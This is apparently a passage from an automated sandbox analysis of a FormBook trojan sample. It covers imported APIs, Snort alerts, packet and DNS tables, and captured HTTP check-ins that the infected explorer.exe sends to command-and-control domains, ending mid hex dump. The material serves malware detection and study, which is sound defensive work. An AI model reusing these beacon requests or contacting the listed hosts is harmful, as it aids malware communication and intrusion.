                                            RT_GROUP_ICON | 0x259a0 | 0x14 | data | English | United States
                                            RT_MANIFEST | 0x259b8 | 0x17d | XML 1.0 document text | English | United States

                                            Imports

                                            DLL | Import
                                            KERNEL32.dll | SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, DecodePointer, VirtualProtect, CloseHandle, EnumLanguageGroupLocalesW, CreateFileW, LCMapStringW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, RaiseException
                                            USER32.dll | GetMessageW, DefWindowProcW, DestroyWindow, DispatchMessageW, TranslateMessage, LoadCursorW, GetClientRect, PostQuitMessage, InvalidateRect, BeginPaint, EndPaint, CreateWindowExW, RegisterClassExW, RegisterClassW, SetMenu, AppendMenuW, GetSysColorBrush, CreateMenu, GetDC, ReleaseDC
                                            GDI32.dll | CreateCompatibleBitmap, CreateCompatibleDC, SetBkColor, SetROP2, ExtTextOutW, GetStockObject, SelectObject, SetPixel, ExtFloodFill, GetDIBits, GetPixel, GetObjectW, DeleteObject, CreateSolidBrush, BitBlt
                                            COMDLG32.dll | ChooseColorW, GetOpenFileNameW

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/03/21-22:19:24.418538 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.4 | 164.68.104.58
08/03/21-22:19:24.418538 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.4 | 164.68.104.58
08/03/21-22:19:24.418538 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.4 | 164.68.104.58
08/03/21-22:20:17.186369 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49760 | 23.227.38.74 | 192.168.2.4

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2021 22:19:24.390264034 CEST | 49747 | 80 | 192.168.2.4 | 164.68.104.58
Aug 3, 2021 22:19:24.418199062 CEST | 80 | 49747 | 164.68.104.58 | 192.168.2.4
Aug 3, 2021 22:19:24.418390036 CEST | 49747 | 80 | 192.168.2.4 | 164.68.104.58
Aug 3, 2021 22:19:24.418538094 CEST | 49747 | 80 | 192.168.2.4 | 164.68.104.58
Aug 3, 2021 22:19:24.449351072 CEST | 80 | 49747 | 164.68.104.58 | 192.168.2.4
Aug 3, 2021 22:19:24.652371883 CEST | 80 | 49747 | 164.68.104.58 | 192.168.2.4
Aug 3, 2021 22:19:24.652398109 CEST | 80 | 49747 | 164.68.104.58 | 192.168.2.4
Aug 3, 2021 22:19:24.652532101 CEST | 49747 | 80 | 192.168.2.4 | 164.68.104.58
Aug 3, 2021 22:19:24.652604103 CEST | 49747 | 80 | 192.168.2.4 | 164.68.104.58
Aug 3, 2021 22:19:24.680361986 CEST | 80 | 49747 | 164.68.104.58 | 192.168.2.4
Aug 3, 2021 22:19:29.706634998 CEST | 49748 | 80 | 192.168.2.4 | 52.58.78.16
Aug 3, 2021 22:19:29.724163055 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.4
Aug 3, 2021 22:19:29.724359989 CEST | 49748 | 80 | 192.168.2.4 | 52.58.78.16
Aug 3, 2021 22:19:29.724525928 CEST | 49748 | 80 | 192.168.2.4 | 52.58.78.16
Aug 3, 2021 22:19:29.741926908 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.4
Aug 3, 2021 22:19:29.741950989 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.4
Aug 3, 2021 22:19:29.741966009 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.4
Aug 3, 2021 22:19:29.742088079 CEST | 49748 | 80 | 192.168.2.4 | 52.58.78.16
Aug 3, 2021 22:19:29.742151976 CEST | 49748 | 80 | 192.168.2.4 | 52.58.78.16
Aug 3, 2021 22:19:29.759646893 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.4
Aug 3, 2021 22:19:34.796736956 CEST | 49754 | 80 | 192.168.2.4 | 163.123.204.26
Aug 3, 2021 22:19:34.934947968 CEST | 80 | 49754 | 163.123.204.26 | 192.168.2.4
Aug 3, 2021 22:19:34.935086012 CEST | 49754 | 80 | 192.168.2.4 | 163.123.204.26
Aug 3, 2021 22:19:34.935245991 CEST | 49754 | 80 | 192.168.2.4 | 163.123.204.26
Aug 3, 2021 22:19:35.073268890 CEST | 80 | 49754 | 163.123.204.26 | 192.168.2.4
Aug 3, 2021 22:19:35.076021910 CEST | 80 | 49754 | 163.123.204.26 | 192.168.2.4
Aug 3, 2021 22:19:35.076055050 CEST | 80 | 49754 | 163.123.204.26 | 192.168.2.4
Aug 3, 2021 22:19:35.076257944 CEST | 49754 | 80 | 192.168.2.4 | 163.123.204.26
Aug 3, 2021 22:19:35.076282024 CEST | 49754 | 80 | 192.168.2.4 | 163.123.204.26
Aug 3, 2021 22:19:35.214565992 CEST | 80 | 49754 | 163.123.204.26 | 192.168.2.4
Aug 3, 2021 22:19:40.149452925 CEST | 49755 | 80 | 192.168.2.4 | 198.74.106.237
Aug 3, 2021 22:19:40.323643923 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.323803902 CEST | 49755 | 80 | 192.168.2.4 | 198.74.106.237
Aug 3, 2021 22:19:40.323954105 CEST | 49755 | 80 | 192.168.2.4 | 198.74.106.237
Aug 3, 2021 22:19:40.497961998 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547720909 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547755003 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547775030 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547797918 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547816038 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547830105 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:40.547919035 CEST | 49755 | 80 | 192.168.2.4 | 198.74.106.237
Aug 3, 2021 22:19:40.548029900 CEST | 49755 | 80 | 192.168.2.4 | 198.74.106.237
Aug 3, 2021 22:19:40.548136950 CEST | 49755 | 80 | 192.168.2.4 | 198.74.106.237
Aug 3, 2021 22:19:40.723388910 CEST | 80 | 49755 | 198.74.106.237 | 192.168.2.4
Aug 3, 2021 22:19:45.980710030 CEST | 49756 | 80 | 192.168.2.4 | 103.88.34.80
Aug 3, 2021 22:19:48.990536928 CEST | 49756 | 80 | 192.168.2.4 | 103.88.34.80
Aug 3, 2021 22:19:55.006757021 CEST | 49756 | 80 | 192.168.2.4 | 103.88.34.80
Aug 3, 2021 22:20:08.798780918 CEST | 49759 | 80 | 192.168.2.4 | 103.88.34.80
Aug 3, 2021 22:20:11.804847002 CEST | 49759 | 80 | 192.168.2.4 | 103.88.34.80
Aug 3, 2021 22:20:17.805396080 CEST | 49759 | 80 | 192.168.2.4 | 103.88.34.80

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2021 22:18:02.405987024 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:02.449356079 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:02.476893902 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:03.138885021 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:03.171201944 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:03.955722094 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:03.991257906 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:04.248619080 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:04.286288977 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:04.579786062 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:04.604487896 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:05.596151114 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:05.624344110 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:06.369427919 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:06.396821022 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:07.410661936 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:07.438966990 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:08.119298935 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:08.144279957 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:08.962778091 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:08.988687992 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:10.738295078 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:10.763365030 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:11.391449928 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:11.418932915 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:12.993232012 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:13.025767088 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:15.728723049 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:15.763833046 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:16.562700987 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:16.587393999 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:18.197205067 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:18.232480049 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:19.041738033 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:19.069494009 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:19.759186983 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:19.784358978 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:20.471590042 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:20.500682116 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:38.410734892 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:38.452064991 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:18:57.129854918 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:18:57.165270090 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:22.344090939 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:22.389576912 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:24.335433006 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:24.385238886 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:29.665224075 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:29.705188990 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:31.378773928 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:31.414267063 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:34.758735895 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:34.795322895 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:40.112061024 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:40.148045063 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:45.557126045 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:45.978787899 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:57.383922100 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:57.420855045 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:19:58.751995087 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:19:58.800821066 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:20:08.440460920 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:20:08.782097101 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 22:20:17.044122934 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 22:20:17.088299990 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 3, 2021 22:19:24.335433006 CEST | 192.168.2.4 | 8.8.8.8 | 0xec26 | Standard query (0) | www.ejsuniqueclasses.com | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:29.665224075 CEST | 192.168.2.4 | 8.8.8.8 | 0x749f | Standard query (0) | www.healthpragency.com | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:34.758735895 CEST | 192.168.2.4 | 8.8.8.8 | 0x1331 | Standard query (0) | www.circusocks.com | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:40.112061024 CEST | 192.168.2.4 | 8.8.8.8 | 0x7a36 | Standard query (0) | www.466se.com | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:45.557126045 CEST | 192.168.2.4 | 8.8.8.8 | 0x74b5 | Standard query (0) | www.856380062.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 22:20:08.440460920 CEST | 192.168.2.4 | 8.8.8.8 | 0x915 | Standard query (0) | www.856380062.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 22:20:17.044122934 CEST | 192.168.2.4 | 8.8.8.8 | 0xb21e | Standard query (0) | www.comparaca.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 3, 2021 22:19:24.385238886 CEST | 8.8.8.8 | 192.168.2.4 | 0xec26 | No error (0) | www.ejsuniqueclasses.com | ejsuniqueclasses.com | | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 22:19:24.385238886 CEST | 8.8.8.8 | 192.168.2.4 | 0xec26 | No error (0) | ejsuniqueclasses.com | | 164.68.104.58 | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:29.705188990 CEST | 8.8.8.8 | 192.168.2.4 | 0x749f | No error (0) | www.healthpragency.com | | 52.58.78.16 | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:34.795322895 CEST | 8.8.8.8 | 192.168.2.4 | 0x1331 | No error (0) | www.circusocks.com | circusocks.com | | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 22:19:34.795322895 CEST | 8.8.8.8 | 192.168.2.4 | 0x1331 | No error (0) | circusocks.com | | 163.123.204.26 | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:40.148045063 CEST | 8.8.8.8 | 192.168.2.4 | 0x7a36 | No error (0) | www.466se.com | | 198.74.106.237 | A (IP address) | IN (0x0001)
Aug 3, 2021 22:19:45.978787899 CEST | 8.8.8.8 | 192.168.2.4 | 0x74b5 | No error (0) | www.856380062.xyz | | 103.88.34.80 | A (IP address) | IN (0x0001)
Aug 3, 2021 22:20:08.782097101 CEST | 8.8.8.8 | 192.168.2.4 | 0x915 | No error (0) | www.856380062.xyz | | 103.88.34.80 | A (IP address) | IN (0x0001)
Aug 3, 2021 22:20:17.088299990 CEST | 8.8.8.8 | 192.168.2.4 | 0xb21e | No error (0) | www.comparaca.com | comparaca.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 22:20:17.088299990 CEST | 8.8.8.8 | 192.168.2.4 | 0xb21e | No error (0) | comparaca.myshopify.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 22:20:17.088299990 CEST | 8.8.8.8 | 192.168.2.4 | 0xb21e | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.ejsuniqueclasses.com
• www.healthpragency.com
• www.circusocks.com
• www.466se.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49747 | 164.68.104.58 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 3, 2021 22:19:24.418538094 CEST | 1218 | OUT | GET /ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T HTTP/1.1
Host: www.ejsuniqueclasses.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 3, 2021 22:19:24.652371883 CEST | 1219 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Aug 2021 20:19:24 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://ejsuniqueclasses.com/ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49748 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 3, 2021 22:19:29.724525928 CEST | 1220 | OUT | GET /ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO HTTP/1.1
Host: www.healthpragency.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 3, 2021 22:19:29.741950989 CEST | 1220 | IN | HTTP/1.1 410 Gone
Server: openresty
Date: Tue, 03 Aug 2021 20:19:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 61 6c 74 68 70 72 61 67 65 6e 63 79 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 65 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 61 6c 74 68 70 72 61 67 65 6e 63 79 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7<html>9 <head>52 <meta http-equiv='refresh' content='5; url=http://www.healthpragency.com/' />a </head>9 <body>3e You are being redirected to http://www.healthpragency.coma </body>8</html>0

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49754 | 163.123.204.26 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 3, 2021 22:19:34.935245991 CEST | 4475 | OUT | GET /ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky HTTP/1.1
Host: www.circusocks.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 3, 2021 22:19:35.076021910 CEST | 4476 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 03 Aug 2021 20:19:35 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 196
Connection: close
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49755 | 198.74.106.237 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 3, 2021 22:19:40.323954105 CEST | 4476 | OUT | GET /ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO HTTP/1.1
Host: www.466se.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 3, 2021 22:19:40.547720909 CEST | 4478 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Aug 2021 20:01:44 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 